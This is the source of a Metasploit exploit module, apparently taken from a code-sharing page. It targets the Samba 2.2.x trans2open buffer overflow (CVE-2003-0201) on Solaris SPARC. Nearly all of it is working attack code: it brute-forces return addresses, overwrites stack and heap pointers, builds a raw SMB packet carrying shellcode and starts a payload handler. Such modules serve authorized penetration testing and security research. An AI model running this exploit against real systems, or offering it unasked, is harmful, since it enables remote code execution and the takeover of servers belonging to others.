Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Samba trans2open Overflow (Solaris SPARC)',
15
      'Description'    => %q{
16
          This exploits the buffer overflow found in Samba versions
17
        2.2.0 to 2.2.8. This particular module is capable of
18
        exploiting the flaw on Solaris SPARC systems that do not
19
        have the noexec stack option set. Big thanks to MC and
20
        valsmith for resolving a problem with the beta version of
21
        this module.
22
      },
23
      'Author'         => [ 'hdm', 'jduck' ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '2003-0201' ],
28
          [ 'OSVDB', '4469' ],
29
          [ 'BID', '7294' ],
30
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
31
        ],
32
      'Privileged'     => true,
33
      'Payload'        =>
34
        {
35
          'Space'    => 1024,
36
          'BadChars' => "\x00",
37
          'MinNops'  => 512,
38
        },
39
      'Platform'       => 'solaris',
40
      'Targets'        =>
41
        [
42
          [ 'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
43
            {
44
              'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack
45
              'Offset'       => 1103,
46
              'Bruteforce'   =>
47
                {
48
                  'Start' => { 'Ret' => 0xffbffaf0 },
49
                  'Stop'  => { 'Ret' => 0xffbfa000 },
50
                  'Step'  => 128
51
                }
52
            }
53
          ],
54

55
          [ 'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
56
            {
57
              'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack
58
              'Offset'       => 1103,
59
              'Bruteforce'   =>
60
                {
61
                  'Start' => { 'Ret' => 0xffbefaf0 },
62
                  'Stop'  => { 'Ret' => 0xffbea000 },
63
                  'Step'  => 128
64
                }
65
            }
66
          ]
67
        ],
68
      'DefaultTarget'  => 0,
69
      'DisclosureDate' => '2003-04-07'
70
      ))
71

72
    register_options(
73
      [
74
        Opt::RPORT(139)
75
      ])
76

77
    deregister_options('SMB::ProtocolVersion')
78
  end
79

80
  def brute_exploit(addrs)
81

82
    curr_ret = addrs['Ret']
83
    begin
84
      print_status("Trying return address 0x%.8x..." %  curr_ret)
85

86
      connect(versions: [1])
87
      smb_login
88

89
      #
90
      # The obstacle course:
91
      # 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
92
      # 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
93
      # 	return(outsize);
94
      #
95

96
      # This value *must* be 1988 to allow findrecv shellcode to work
97
      pattern = rand_text_english(1988)
98

99
      #
100
      # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
101
      #
102
      # Patch the overwritten heap pointers
103
      # substr($pattern, 1159, 4, pack('N', $target->[4]));
104
      # substr($pattern, 1163, 4, pack('N', $target->[4]));
105
      #
106
      # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
107
      # substr($pattern, 1195, 4, pack('N', 0xffffffff));
108
      #
109
      # Fix the frame pointer (need to check for null in address)
110
      # substr($pattern, 1243, 4, pack('N', $target->[3]-64));
111
      #
112
      # Finally set the return address
113
      # substr($pattern, 1247, 4, pack('N', $curr_ret));
114
      #
115

116
      #
117
      # This method is more reliable against a wider range of targets
118
      #
119

120
      off = target['Offset']
121
      ptr_to_non_zero = target['PtrToNonZero']
122

123
      # Local variable pointer patches for early versions of 2.2.x
124
      pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
125
      off += 36
126

127
      # Overwrite heap pointers with a ptr to NULL at the top of the stack
128
      pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
129
      off += 40
130

131
      # Patch the type index into the smb_messages[] array...
132
      # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
133
      pattern[off, 20] = [0xffffffff].pack('N') * 5
134
      off += 20
135

136
      # This stream covers the framepointer and the return address
137
      pattern[off, 400] = [curr_ret].pack('N') * 100
138

139
      # Stuff the shellcode into the request
140
      pattern[3, payload.encoded.length] = payload.encoded
141

142
      trans =
143
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
144
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
145
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
146
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
147
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
148
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
149
        pattern
150

151
      sock.put(trans)
152
      handler
153
      disconnect
154

155
    rescue EOFError
156
    rescue => e
157
      print_error("#{e}")
158
    end
159

160
  end
161
end
162

163